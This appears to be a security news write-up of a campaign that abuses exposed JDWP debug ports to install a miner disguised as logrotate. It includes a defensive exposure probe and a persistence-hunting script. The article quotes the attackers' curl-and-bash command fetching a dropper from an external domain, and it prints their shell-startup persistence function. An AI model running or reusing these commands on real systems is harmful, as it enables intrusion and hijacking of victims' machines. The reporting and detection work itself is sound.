Hackers Exploiting Java Debug Wire Protocol Servers in the Wild to Deploy Cryptomining Payload

A new wave of attacks is targeting organizations that inadvertently expose Java Debug Wire Protocol (JDWP) servers to the internet, with attackers using this overlooked entry point to deploy a customized cryptomining payload.

JDWP, a standard feature of the Java platform, is the protocol a debugger uses to attach to a running JVM, inspect its state and control execution. It carries no authentication or encryption of its own: anyone who can reach the port can attach.

When JDWP is left reachable on production systems, typically because the JVM was started with the -agentlib:jdwp debug option bound to all interfaces, as it often is in development, it becomes a direct path to remote code execution.


Exploitation follows exposure quickly. In several observed incidents, attackers compromised vulnerable machines within hours of the port becoming reachable.

The attack flow typically begins with mass internet scans for open JDWP ports, most commonly port 5005. Once a target is identified, the attacker completes the JDWP handshake (a 14-byte ASCII exchange that a JVM echoes back verbatim) to confirm the service is live and then establishes a session, gaining interactive access to the Java Virtual Machine (JVM).

This access allows the adversary to enumerate loaded classes and invoke methods, with java.lang.Runtime.exec the usual target, which amounts to arbitrary command execution on the host.
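The exchange described above, as an added example that is not part of the original article or of Wiz's tooling: a small probe that performs the JDWP handshake and then issues a single read-only VirtualMachine.Version command (command set 1, command 1), which is enough to confirm that a port is an exposed, unauthenticated JVM debug agent and to fingerprint it. The mock JVM is constructed so the probe can be exercised offline; its version strings are made-up values, and against a real host you would point probe_jdwp() at the suspected port (commonly 5005).

```python
"""JDWP exposure probe: handshake, then VirtualMachine.Version (command set 1,
command 1).  Added example, not the article's or Wiz's code.  The mock JVM below
is constructed so the probe can be exercised offline."""
import socket
import struct
import threading

HANDSHAKE = b"JDWP-Handshake"             # 14 ASCII bytes, echoed back verbatim by a JVM
CMD_HEADER = struct.Struct(">IIBBB")      # length, id, flags, command set, command
REPLY_HEADER = struct.Struct(">IIBH")     # length, id, flags (0x80 = reply), error code
FLAG_REPLY = 0x80
VM_SET, VM_VERSION = 1, 1                 # VirtualMachine command set / Version command
ERR_NOT_IMPLEMENTED = 99


def build_command(pkt_id, cmd_set, cmd, data=b""):
    """Encode a JDWP command packet; length covers the 11-byte header plus data."""
    return CMD_HEADER.pack(CMD_HEADER.size + len(data), pkt_id, 0, cmd_set, cmd) + data


def recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed connection")
        buf += chunk
    return buf


def jdwp_string(data, off):
    """Decode a JDWP string (4-byte big-endian length + UTF-8) at offset off."""
    (n,) = struct.unpack_from(">I", data, off)
    return data[off + 4:off + 4 + n].decode("utf-8"), off + 4 + n


def probe_jdwp(host, port, timeout=3.0):
    """Return a dict describing the VM if host:port speaks JDWP, else None."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(HANDSHAKE)
            if recv_exact(s, len(HANDSHAKE)) != HANDSHAKE:
                return None                   # not JDWP (or some other service's banner)
            s.sendall(build_command(1, VM_SET, VM_VERSION))
            length, pkt_id, flags, err = REPLY_HEADER.unpack(recv_exact(s, REPLY_HEADER.size))
            data = recv_exact(s, length - REPLY_HEADER.size)
            if pkt_id != 1 or not flags & FLAG_REPLY or err != 0:
                return None
            # Version reply: description, jdwpMajor, jdwpMinor, vmVersion, vmName
            desc, off = jdwp_string(data, 0)
            major, minor = struct.unpack_from(">II", data, off)
            vm_version, off = jdwp_string(data, off + 8)
            vm_name, _ = jdwp_string(data, off)
            return {"description": desc, "jdwp": f"{major}.{minor}",
                    "vm_version": vm_version, "vm_name": vm_name}
    except (OSError, ConnectionError, struct.error):
        return None


def _jstr(s):
    b = s.encode("utf-8")
    return struct.pack(">I", len(b)) + b


def start_mock_jvm():
    """Constructed stand-in for an exposed JVM debug agent: answers one client's
    handshake and Version request on a loopback port, then exits.  Returns the port."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def serve():
        conn, _ = srv.accept()
        with srv, conn:
            if recv_exact(conn, len(HANDSHAKE)) != HANDSHAKE:
                return
            conn.sendall(HANDSHAKE)
            length, pkt_id, _flags, cmd_set, cmd = CMD_HEADER.unpack(recv_exact(conn, CMD_HEADER.size))
            recv_exact(conn, length - CMD_HEADER.size)
            if (cmd_set, cmd) == (VM_SET, VM_VERSION):
                body = (_jstr("Java Debug Wire Protocol (Reference Implementation) version 21.0")
                        + struct.pack(">II", 21, 0) + _jstr("21.0.2")
                        + _jstr("OpenJDK 64-Bit Server VM"))   # constructed values
                conn.sendall(REPLY_HEADER.pack(REPLY_HEADER.size + len(body), pkt_id, FLAG_REPLY, 0) + body)
            else:
                conn.sendall(REPLY_HEADER.pack(REPLY_HEADER.size, pkt_id, FLAG_REPLY, ERR_NOT_IMPLEMENTED))

    threading.Thread(target=serve, daemon=True).start()
    return port


if __name__ == "__main__":
    import sys
    host, port = (sys.argv[1], int(sys.argv[2])) if len(sys.argv) == 3 else ("127.0.0.1", start_mock_jvm())
    info = probe_jdwp(host, port)
    print(f"{host}:{port} -> " + ("no JDWP" if info is None else f"EXPOSED JDWP: {info}"))
```

Any host that echoes the handshake and answers Version is already fully exploitable: the attacker's next packets differ from this probe only in which command set and method they invoke, not in any credential. The probe stops at the read-only query, which is what makes it safe to run as an exposure check from a scanner or a CI job.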

Wiz analysts identified this campaign after observing exploitation attempts against their honeypot servers running TeamCity, a popular CI/CD tool.

The attackers showed a high degree of automation and customization, deploying a modified XMRig cryptominer with its configuration hardcoded, avoiding the config file and command-line arguments that normally give XMRig away.

Attack Flow

Notably, the malware used mining pool proxies to obscure the destination wallet address, complicating efforts to trace or disrupt the illicit mining operation.

The impact of these attacks is significant. By abusing JDWP, threat actors can not only deploy cryptominers but also establish deep persistence, manipulate system processes, and potentially pivot to other assets within the compromised environment.

The stealthy nature of the payload, combined with its ability to blend in with legitimate system utilities, increases the risk of prolonged undetected activity and resource drain.

The infection mechanism relies on JDWP's lack of authentication: after attaching, the attackers use the protocol's method-invocation capability to run shell commands on the host.

After establishing a session, they typically fetch and run a dropper script, such as logservice.sh, with commands like:

curl -o /tmp/logservice.sh -s https://canonicalconnect[.]com/logservice.sh
bash /tmp/logservice.sh

This script is engineered to kill competing miners, download the malicious XMRig binary disguised as logrotate, and install it in the user’s configuration directory.

The script then sets up multiple persistence mechanisms, including modifying shell startup files, creating cron jobs, and installing a fake system service.

The following excerpt illustrates how the script ensures persistence via shell configuration:-

add_to_startup() {
  # $1 is a shell startup file such as ~/.bashrc; $EXEC is the path of the
  # renamed miner binary. Append the launch line, output silenced, exactly once.
  if [ -r "$1" ]; then
    if ! grep -Fxq "$EXEC >/dev/null 2>&1" "$1"; then
      echo "$EXEC >/dev/null 2>&1" >> "$1"
    fi
  fi
}
Infection chain (Source – Wiz)
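The persistence described above leaves recognisable traces in exactly the places the script touches: shell startup files, crontabs and unit files. The following hunting script, added here as an example and not code from the article or from Wiz, scans such files for a binary named after a system utility but run from somewhere other than a system bin directory (the logrotate lookalike in the user's configuration directory), or for anything launched from a hidden or scratch directory with its output silenced. The three sample files are constructed; the masquerade-name list, the directory sets and the heuristics are this example's assumptions, and only logrotate comes from the article.

```python
"""Hunt for miner persistence in shell startup files, crontabs and unit files.
Added example, not the article's or Wiz's code.  Samples below are constructed;
MASQUERADE_NAMES, SYSTEM_BIN_DIRS and SCRATCH_DIRS are this example's assumptions."""
import os
import shlex

SYSTEM_BIN_DIRS = {"/bin", "/sbin", "/usr/bin", "/usr/sbin", "/usr/local/bin", "/usr/local/sbin"}
MASQUERADE_NAMES = {"logrotate"}      # system utility names a miner may borrow; extend as needed
SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")


def first_command_path(line):
    """Return the first absolute or home-relative path token on the line, unwrapping
    key=value forms such as systemd's ExecStart=/path, or None if there is none."""
    try:
        tokens = shlex.split(line)
    except ValueError:                   # unbalanced quotes: fall back to whitespace split
        tokens = line.split()
    for tok in tokens:
        if "=" in tok and not tok.startswith("/"):
            tok = tok.split("=", 1)[1]
        if tok.startswith(("/", "~/", "$HOME/")):
            return tok
    return None


def classify(line):
    """Return a reason string if the line looks like miner persistence, else None."""
    path = first_command_path(line)
    if path is None:
        return None
    name, directory = os.path.basename(path), os.path.dirname(path)
    hidden_dir = any(part.startswith(".") for part in directory.split("/")
                     if part not in ("", ".", ".."))
    if name in MASQUERADE_NAMES and directory not in SYSTEM_BIN_DIRS:
        return f"'{name}' run from {directory}, not a system bin directory"
    if (hidden_dir or path.startswith(SCRATCH_DIRS)) and "/dev/null" in line:
        return f"executable under {directory} with output silenced"
    return None


def scan(text, origin):
    """Scan one file's contents; returns [(origin, line_no, reason), ...]."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        s = line.strip()
        if not s or s.startswith("#"):
            continue
        reason = classify(s)
        if reason:
            hits.append((origin, n, reason))
    return hits


def scan_files(paths):
    """Run scan() over real files that exist; missing or unreadable files are skipped."""
    hits = []
    for p in paths:
        p = os.path.expanduser(p)
        try:
            with open(p, encoding="utf-8", errors="replace") as f:
                hits.extend(scan(f.read(), p))
        except OSError:
            continue
    return hits


# Constructed samples mirroring the startup-file, cron and service persistence described above.
SAMPLE_BASHRC = """\
# ~/.bashrc (constructed sample)
export PATH=$HOME/bin:$PATH
alias ll='ls -l'
/home/svc/.config/logrotate >/dev/null 2>&1
"""
SAMPLE_CRONTAB = """\
0 2 * * * /usr/sbin/logrotate /etc/logrotate.conf
@reboot /home/svc/.config/logrotate >/dev/null 2>&1
"""
SAMPLE_UNIT = """\
[Service]
ExecStart=/home/svc/.config/logrotate
Restart=always
"""

if __name__ == "__main__":
    for origin, text in (("bashrc", SAMPLE_BASHRC), ("crontab", SAMPLE_CRONTAB), ("unit", SAMPLE_UNIT)):
        for hit in scan(text, origin):
            print("%s:%d  %s" % hit)
    for hit in scan_files(["~/.bashrc", "~/.profile", "~/.bash_profile", "/etc/crontab"]):
        print("%s:%d  %s" % hit)
```

The legitimate /usr/sbin/logrotate cron entry in the sample is deliberately left unflagged: the signal is not the name but the mismatch between a well-known utility name and a path under a home or scratch directory, which is also the check to keep in mind when reviewing process listings on a suspect host.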

The infection chain is both efficient and resilient, allowing the cryptominer to survive reboots and user logins.

The attackers’ use of legitimate-sounding process names and system locations further complicates detection and remediation efforts, underscoring the need for vigilant configuration management and robust monitoring of exposed services.
